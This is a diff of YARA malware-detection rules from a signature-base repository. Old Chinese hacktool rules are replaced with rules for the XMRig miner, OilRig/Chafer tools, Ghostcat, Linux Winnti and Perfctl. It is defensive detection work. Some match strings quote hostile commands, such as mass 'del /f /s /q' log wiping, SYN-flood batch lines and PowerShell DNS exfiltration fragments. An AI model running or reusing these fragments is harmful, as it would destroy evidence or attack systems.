 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "10a72f9882fc0ca141e39277222a8d33aab7f7a4b524c109506a407cd10d738c"
 
 	strings:
-		$s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii
-		$s1 = "ExeMiniDownload.exe" fullword wide
-		$s16 = "POST %Hs" fullword ascii
+		$x1 = "number of hash blocks to process at a time (don't set or 0 enables automatic selection o" fullword ascii
+		$s2 = "'h' hashrate, 'p' pause, 'r' resume, 'q' shutdown" fullword ascii
+		$s3 = "* THREADS:      %d, %s, aes=%d, hf=%zu, %sdonate=%d%%" fullword ascii
+		$s4 = ".nicehash.com" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x457f and filesize < 8000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Hacktools_CN_Http : FILE
+rule SIGNATURE_BASE_SUSP_XMRIG_String : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file Http.exe"
+		description = "Detects a suspicious XMRIG crypto miner executable string in filr"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bbff6ff6-8cef-5a83-afd3-34f306e8e715"
-		date = "2014-11-17"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1333-L1349"
+		id = "8c6f3e6e-df2a-51b7-81b8-21cd33b3c603"
+		date = "2018-12-28"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_xmrig_monero_miner.yar#L72-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"
-		logic_hash = "690b41bdf856e0d4d90b4a42524134302e9649018fdd495c359582aa6121a017"
-		score = 60
-		quality = 83
+		logic_hash = "d2c3145c50939e7f407125f7b9312161724b7b1a6fcbf7e27d049e49e982c7e9"
+		score = 65
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127"
 
 	strings:
-		$s0 = "RPCRT4.DLL" fullword ascii
-		$s1 = "WNetAddConnection2A" fullword ascii
-		$s2 = "NdrPointerBufferSize" fullword ascii
-		$s3 = "_controlfp" fullword ascii
+		$x1 = "xmrig.exe" fullword ascii
 
 	condition:
-		all of them and filesize < 10KB
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Start
+rule SIGNATURE_BASE_Chafer_Mimikatz_Custom : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file Start.bat - DoS tool"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1291fbc5-fbb3-5425-bb9a-e45f4d7cf562"
-		date = "2014-11-17"
-		modified = "2023-01-27"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1351-L1373"
+		description = "Detects Custom Mimikatz Version"
+		author = "Florian Roth (Nextron Systems) / Markus Neis"
+		id = "80f751c3-d7ca-5ff6-a905-38650e1c4ec5"
+		date = "2018-03-22"
+		modified = "2023-12-05"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L11-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"
-		logic_hash = "b435957150da7b790809d2cf90a01c967127c183ddcbf333beda1a7c599b69a5"
-		score = 60
+		logic_hash = "d3b74be6d221592fb867bd9589f5e4b246a093bd276efa3515d9e948a38eda48"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "9709afeb76532566ee3029ecffc76df970a60813bcac863080cc952ad512b023"
 
 	strings:
-		$s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" ascii
-		$s1 = "Blast.bat /r 600" fullword ascii
-		$s2 = "Blast.bat /l Blast.bat" fullword ascii
-		$s3 = "Blast.bat /c 600" fullword ascii
-		$s4 = "start Clear.bat" fullword ascii
-		$s5 = "del Result.txt" fullword ascii
-		$s6 = "s syn %%i %%j 3306 /save" fullword ascii
-		$s7 = "start Thecard.bat" fullword ascii
-		$s10 = "setlocal enabledelayedexpansion" fullword ascii
+		$x1 = "C:\\Users\\win7p\\Documents\\mi-back\\" ascii
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Panda_Tasksvr
+rule SIGNATURE_BASE_Chafer_Exploit_Copyright_2017 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file tasksvr.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5c85b382-551a-5e9e-9af8-d106cbe26f74"
-		date = "2014-11-17"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1375-L1390"
+		description = "Detects Oilrig Internet Server Extension with Copyright (C) 2017 Exploit"
+		author = "Markus Neis"
+		id = "f78ae4f5-0569-5fc8-ab25-ebe38afd9f3c"
+		date = "2018-03-22"
+		modified = "2023-12-05"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L25-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"
-		logic_hash = "183708e525ec6676662b59a2a3c79f5113a80f2d5b3bd4713c74a536fe303b2d"
-		score = 60
+		logic_hash = "53d3e735bc368de152f4f4058617bc2cc5574bc13777f743442ff2bfafe92791"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "cdac69caad8891c5e1b8eabe598c869674dee30af448ce4e801a90eb79973c66"
 
 	strings:
-		$s2 = "Consys21.dll" fullword ascii
-		$s4 = "360EntCall.exe" fullword wide
-		$s15 = "Beijing1" fullword ascii
+		$x1 = "test3 Internet Server Extension" fullword wide
+		$x2 = "Copyright (C) 2017 Exploit" fullword wide
+		$a1 = "popen() failed!" fullword ascii
+		$a2 = "cmd2cmd=" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or all of ( $a* ) )
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Clear
+rule SIGNATURE_BASE_Chafer_Portscanner : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file Clear.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "21f33a36-779e-5eac-819c-ef79f291b43c"
-		date = "2014-11-17"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1392-L1413"
+		description = "Detects Custom Portscanner used by Oilrig"
+		author = "Markus Neis"
+		id = "8db934c3-fb0d-5c87-9096-1ee8fb16f9a5"
+		date = "2018-03-22"
+		modified = "2023-12-05"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L45-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"
-		logic_hash = "d10ed2c6ea3f1a8b289529cc90f50f84288003576aced903f48db3c2abc4722d"
-		score = 60
+		logic_hash = "6e0475a5c0fc8155359376113f88f3de080968388bd3ea60664a063540688faf"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "88274a68a6e07bdc53171641e7349d6d0c71670bd347f11dcc83306fe06656e9"
 
 	strings:
-		$s0 = "del /f /s /q %systemdrive%\\*.log    " fullword ascii
-		$s1 = "del /f /s /q %windir%\\*.bak    " fullword ascii
-		$s4 = "del /f /s /q %systemdrive%\\*.chk    " fullword ascii
-		$s5 = "del /f /s /q %systemdrive%\\*.tmp    " fullword ascii
-		$s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " fullword ascii
-		$s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " fullword ascii
-		$s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " fullword ascii
-		$s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " fullword ascii
-		$s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii
+		$x1 = "C:\\Users\\RS01204N\\Documents\\" ascii
+		$x2 = "PortScanner /ip:google.com  /port:80 /t:500 /tout:2" fullword ascii
+		$x3 = "open ports of host/hosts" fullword ascii
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Thecard
+rule SIGNATURE_BASE_Oilrig_Myrtille : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file Thecard.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a9946aeb-2042-522f-8d91-f8b96341bb64"
-		date = "2014-11-17"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1415-L1432"
+		description = "Detects Oilrig Myrtille RDP Browser"
+		author = "Markus Neis"
+		id = "e742ab0c-0e21-569e-a100-e5082dc1d372"
+		date = "2018-03-22"
+		modified = "2022-12-21"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L61-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"
-		logic_hash = "29e1fb2e0bfa60e5406f9fd1c0ec99f0fc1b416ffc4d59846627e40959a32c63"
-		score = 60
+		logic_hash = "373115c0a3fbfe93435aca07cbac52c7649a77d8b7d6eda8af5ce4a1a42e53a6"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "67945f2e65a4a53e2339bd361652c6663fe25060888f18e681418e313d1292ca"
 
 	strings:
-		$s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii
-		$s1 = "Http://www.coffeewl.com" fullword ascii
-		$s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii
-		$s3 = "for /L %%a in (" ascii
-		$s4 = "MODE con: COLS=42 lines=5" fullword ascii
+		$x1 = "\\obj\\Release\\Myrtille.Services.pdb" ascii
+		$x2 = "Failed to notify rdp client process exit (MyrtilleAppPool down?), remote session {0} ({1})" fullword wide
+		$x3 = "Started rdp client process, remote session {0}" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Blast
+rule SIGNATURE_BASE_Chafer_Packed_Mimikatz : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file Blast.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9ac723c4-e88d-5fb3-b18f-c8b764c8acf3"
-		date = "2014-11-17"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1434-L1448"
+		description = "Detects Oilrig Packed Mimikatz also detected as Chafer_WSC_x64 by FR"
+		author = "Florian Roth (Nextron Systems) / Markus Neis"
+		id = "abd34c6a-7d99-5f52-be8e-a7d634d61255"
+		date = "2018-03-22"
+		modified = "2023-12-05"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L78-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b07702a381fa2eaee40b96ae2443918209674051"
-		logic_hash = "77902c7b23bab80d035f1dbe074554f16f99b2c9e31c80171296a1d33f705dac"
-		score = 60
+		logic_hash = "0cee5270c9b76f1419c6989113dca221c5ba6f027a104d71f61d38cb59af51cd"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "5f2c3b5a08bda50cca6385ba7d84875973843885efebaff6a482a38b3cb23a7c"
 
 	strings:
-		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
-		$s1 = "@echo off" fullword ascii
+		$s1 = "Windows Security Credentials" fullword wide
+		$s2 = "Minisoft" fullword wide
+		$x1 = "Copyright (c) 2014 - 2015 Minisoft" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( all of ( $s* ) or $x1 )
 }
-rule SIGNATURE_BASE_Vubrute_Vubrute
+rule SIGNATURE_BASE_Oilrig_PS_Cnc : FILE
 {
 	meta:
-		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7ac74c85-465c-5eb5-8e91-004f28cabb75"
-		date = "2014-11-22"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1450-L1466"
+		description = "Powershell CnC using DNS queries"
+		author = "Markus Neis"
+		id = "cbc5689c-37ff-59b6-9e3a-7d8577021f70"
+		date = "2018-03-22"
+		modified = "2023-12-05"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L94-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"
-		logic_hash = "9dab03b70b249c0c481e3bc98c3196e83da93ea2723674d38baf32469392d52a"
-		score = 70
+		logic_hash = "0566f0707021af0d08426eec497292098273d46b020a5f0be6b98835ceeb82bc"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "9198c29a26f9c55317b4a7a722bf084036e93a41ba4466cbb61ea23d21289cfa"
 
 	strings:
-		$s0 = "Text Files (*.txt);;All Files (*)" fullword ascii
-		$s1 = "http://ubrute.com" fullword ascii
-		$s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii
-		$s14 = "error.txt" fullword ascii
+		$x1 = "(-join $base32filedata[$uploadedCompleteSize..$($uploadedCompleteSize" fullword ascii
+		$s2 = "$hostname = \"D\" + $fileID + (-join ((65..90) + (48..57) + (97..122)|" ascii
 
 	condition:
-		all of them
+		filesize < 40KB and 1 of them
 }
-rule SIGNATURE_BASE_DK_Brute
+rule SIGNATURE_BASE_VUL_Tomcat_Catalina_CVE_2020_1938 : FILE
 {
 	meta:
-		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"
+		description = "Detects a possibly active and vulnerable Tomcat configuration that includes an accessible and unprotected AJP connector (you can ignore backup files or files that are not actively used)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c9ea0dcf-10f3-5161-aebc-2db04c24b0a5"
-		date = "2014-11-22"
-		modified = "2025-12-18"
-		reference = "http://goo.gl/xiIphp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1468-L1485"
+		id = "d23af7ce-eb5d-50aa-be02-b4bf858641c2"
+		date = "2020-02-28"
+		modified = "2023-12-05"
+		reference = "https://www.chaitin.cn/en/ghostcat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_cve_2020_1938.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"
-		logic_hash = "a48ba3513c9c99066e9dda02859089e9e1db15e7bd52443795771609f011c94a"
-		score = 70
+		logic_hash = "902b469c8a31add2254e8d5ade6bc22f1bc0a2b10ea70f3131f0640f2900e667"
+		score = 50
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s6 = "get_CrackedCredentials" fullword ascii
-		$s13 = "Same port used for two different protocols:" fullword wide
-		$s18 = "coded by fLaSh" fullword ascii
-		$s19 = "get_grbToolsScaningCracking" fullword ascii
+		$h1 = "<?xml "
+		$a1 = "<Service name=\"Catalina\">" ascii
+		$v1 = "<Connector port=\"8009\" protocol=\"AJP/1.3\" redirectPort=\"8443\"/>" ascii
+		$fp1 = "<!--<Connector port=\"8009\" protocol=\"AJP/1.3\" redirectPort=\"8443\"" ascii
+		$fp2 = " secret=\"" ascii
+		$fp3 = " requiredSecret=\"" ascii
 
 	condition:
-		all of them
+		$h1 at 0 and filesize <= 300KB and $a1 and $v1 and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Vubrute_Config
+rule SIGNATURE_BASE_APT_MAL_Winntilinux_Dropper_Azazelfork_May19 : AZAZEL_FORK FILE
 {
 	meta:
-		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"
-		author = "Florian Roth (Nextron Systems)"
-		id = "25cad108-b2d6-5886-bb2f-e614e05649fa"
-		date = "2014-11-22"
-		modified = "2025-12-18"
-		reference = "http://goo.gl/xiIphp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1487-L1507"
+		description = "Detection of Linux variant of Winnti"
+		author = "Silas Cutler (havex [@] chronicle.security), Chronicle Security"
+		id = "d641de9a-e563-5067-b7e4-0aa83a087ed4"
+		date = "2019-05-15"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_linux.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b9f66b9265d2370dab887604921167c11f7d93e9"
-		logic_hash = "b4c54d5ecb269c7310b5bd2a9e8fe5d6c75503f8cb1f25679399e25185d9cb51"
-		score = 70
+		hash = "4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a"
+		logic_hash = "0af32675dccfd0ad0c7919683fddced6ad49c65800ffa523773b7342b431379f"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "AZAZEL_FORK, FILE"
+		version = "1.0"
+		TLP = "White"
 
 	strings:
-		$s2 = "Restore=1" fullword ascii
-		$s6 = "Thread=" ascii
-		$s7 = "Running=1" fullword ascii
-		$s8 = "CheckCombination=" fullword ascii
-		$s10 = "AutoSave=1.000000" fullword ascii
-		$s12 = "TryConnect=" ascii
-		$s13 = "Tray=" ascii
+		$config_decr = { 48 89 45 F0 C7 45 EC 08 01 00 00 C7 45 FC 28 00 00 00 EB 31 8B 45 FC 48 63 D0 48 8B 45 F0 48 01 C2 8B 45 FC 48 63 C8 48 8B 45 F0 48 01 C8 0F B6 00 89 C1 8B 45 F8 89 C6 8B 45 FC 01 F0 31 C8 88 02 83 45 FC 01 }
+		$export1 = "our_sockets"
+		$export2 = "get_our_pids"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x457f and all of them
 }
-rule SIGNATURE_BASE_Sig_238_Hunt
+rule SIGNATURE_BASE_APT_MAL_Winntilinux_Main_Azazelfork_May19 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file hunt.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5d9d1f99-2f12-51e9-a554-b349e19d00fb"
-		date = "2014-11-23"
-		modified = "2025-12-18"
+		description = "Detection of Linux variant of Winnti"
+		author = "Silas Cutler (havex [@] chronicle.security), Chronicle Security"
+		id = "a1693e2d-4d89-5cc7-ab14-c8feb000638a"
+		date = "2019-05-15"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1509-L1528"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_linux.yar#L18-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"
-		logic_hash = "66d22c4dc2864d61bd485d6840887905f020fce8e19bb976ec09acaa6ed0387c"
-		score = 60
-		quality = 83
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash = "ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23"
+		logic_hash = "3ff38795179f6c32f2ff014b06ac126ae3a0de3fe7515f0e49f12f9c8ff14b43"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		version = "1.0"
+		TLP = "White"
+
+	strings:
+		$uuid_lookup = "/usr/sbin/dmidecode  | grep -i 'UUID' |cut -d' ' -f2 2>/dev/null"
+		$dbg_msg = "[advNetSrv] can not create a PF_INET socket"
+		$rtti_name1 = "CNetBase"
+		$rtti_name2 = "CMyEngineNetEvent"
+		$rtti_name3 = "CBufferCache"
+		$rtti_name4 = "CSocks5Base"
+		$rtti_name5 = "CDataEngine"
+		$rtti_name6 = "CSocks5Mgr"
+		$rtti_name7 = "CRemoteMsg"
+
+	condition:
+		uint16( 0 ) == 0x457f and ( ( $dbg_msg and 1 of ( $rtti* ) ) or ( 5 of ( $rtti* ) ) or ( $uuid_lookup and 2 of ( $rtti* ) ) )
+}
+rule SIGNATURE_BASE_MAL_EXPL_Perfctl_Oct24 : FILE
+{
+	meta:
+		description = "Detects exploits used in relation with Perfctl malware campaigns"
+		author = "Florian Roth"
+		id = "1f525eaf-445c-592e-bfa4-e9846390dd1d"
+		date = "2024-10-09"
+		modified = "2024-12-12"
+		reference = "https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_perfctl_oct24.yar#L2-L21"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "44d4683efc66b3c6c2d32be6b83a2bbc1db39c9a020365dddd27c20667bc6a66"
+		score = 80
+		quality = 85
+		tags = "FILE"
+		hash1 = "22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13"
 
 	strings:
-		$s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii
-		$s3 = "Usage - hunt \\\\servername" fullword ascii
-		$s4 = ".share = %S - %S" fullword wide
-		$s5 = "SMB share enumerator and admin finder " fullword ascii
-		$s7 = "Hunt only runs on Windows NT..." fullword ascii
-		$s8 = "User = %S" fullword ascii
-		$s9 = "Admin is %s\\%s" fullword ascii
+		$s1 = "Exploit failed. Target is most likely patched." ascii fullword
+		$s2 = "SHELL=pkexec" ascii fullword
+		$s3 = "/dump_" ascii fullword
+		$s4 = ".EYE$" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x457f and filesize < 30000KB and 2 of them or all of them
 }
-rule SIGNATURE_BASE_Sig_238_Listip
+rule SIGNATURE_BASE_MAL_LNX_Perfctl_Oct24 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file listip.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "417faf20-ee07-5c3e-bfcf-89599e38e62e"
-		date = "2014-11-23"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1530-L1548"
+		description = "Detects Perfctl malware samples"
+		author = "Florian Roth"
+		id = "391513ae-3348-5297-a22a-6f06e50f06d2"
+		date = "2024-10-09"
+		modified = "2024-12-12"
+		reference = "https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_perfctl_oct24.yar#L23-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"
-		logic_hash = "db5cc21e8c76fdd10953ba0f06c4a1ad319ee522d9def7777dad66612b51edfc"
-		score = 60
+		logic_hash = "d47df34240f59124542acc41484e8935327490c04c4e15a558b2ffc6f9c52ea8"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "a6d3c6b6359ae660d855f978057aab1115b418ed277bb9047cd488f9c7850747"
+		hash2 = "ca3f246d635bfa560f6c839111be554a14735513e90b3e6784bedfe1930bdfd6"
 
 	strings:
-		$s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii
-		$s2 = "ERROR No.2!!! Program Terminate." fullword ascii
-		$s4 = "Local Host Name: %s" fullword ascii
-		$s5 = "Packed by exe32pack 1.38" fullword ascii
-		$s7 = "Local Computer Name: %s" fullword ascii
-		$s8 = "Local IP Adress: %s" fullword ascii
+		$op1 = { 83 45 f8 01 8b 45 f8 48 3b 45 98 0f 82 1b ff ff ff 90 c9 c3 55 }
+		$op2 = { 48 8b 55 a0 48 01 ca 0f b6 0a 48 8b 55 a8 89 c0 88 4c 02 18 8b 45 fc 83 e0 3f }
+		$op3 = { 88 4c 10 58 83 45 f8 01 83 7d f8 03 0f 86 68 ff ff ff 90 c9 c3 55 }
+		$op4 = { 48 83 ec 68 48 89 7d a8 48 89 75 a0 48 89 55 98 48 8b 45 a8 48 8b 00 83 e0 3f 89 45 fc }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x457f and filesize < 300KB and 2 of them
 }
-rule SIGNATURE_BASE_Arttrayhookdll
+rule SIGNATURE_BASE_SUSP_PS1_JAB_Pattern_Jun22_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"
+		description = "Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable"
 		author = "Florian Roth (Nextron Systems)"
-		id = "324561fc-024c-5583-aa25-6b13e9616898"
-		date = "2014-11-23"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1550-L1564"
+		id = "9ecca7d9-3b63-5615-a223-5efa1c53510e"
+		date = "2022-06-10"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_ps_jab.yar#L2-L29"
